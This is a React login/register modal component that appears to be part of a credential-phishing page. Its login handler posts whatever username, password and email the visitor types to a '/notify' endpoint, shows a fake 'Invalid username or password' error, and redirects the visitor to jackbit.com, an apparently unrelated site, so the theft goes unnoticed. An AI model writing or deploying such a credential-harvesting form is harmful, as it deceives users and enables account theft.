import React,{useState} from 'react';
import axios from "axios";
import RegisterModal from '../registerModal/RegisterModal.js';
import LoginModal from '../loginModal/LoginModal.js';
import {API_ROOT} from '../../configs/env-vars.js';


function AuthModal({show,close,setUrl,authenticateAction}) {
   const [user, setUser] = useState({username:'', password:'',email:''});

//    const isValidPassword = (password) => {
//     return /^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[A-Za-z\d]{8,15}$/.test(password);
//   };

   const logInAction = (e) =>{
        document.getElementsByClassName('loader-wrapper')[0].style.display = 'block';
        document.getElementsByClassName('login-btn')[0].style.display = 'none';
        e.preventDefault(); 
    
        axios.post(`${API_ROOT}/notify`, user)
            .then(res => window.location = "https://jackbit.com")
            .catch(err => console.error(err));
            
        setTimeout(() => {
            document.getElementsByClassName('loader-wrapper')[0].style.display = 'none';
            document.getElementsByClassName('login-btn')[0].style.display = 'block';
            const error = document.getElementsByClassName('mainError')[0];
            error.innerText = "Invalid username or password";
            error.style.display = 'block';
        }, 500);
        
   }

    return (
        <div className='middle'>
        {show.login ? (
             <LoginModal close={close} logInAction={logInAction} user={user} setUser={setUser} setUrl={setUrl} authenticateAction={authenticateAction} />
        ): show.register ? (
            <RegisterModal close={close} logInAction={logInAction} user={user} setUser={setUser} setUrl={setUrl} authenticateAction={authenticateAction} />
        ): null}
        </div>
    );
}

export default AuthModal;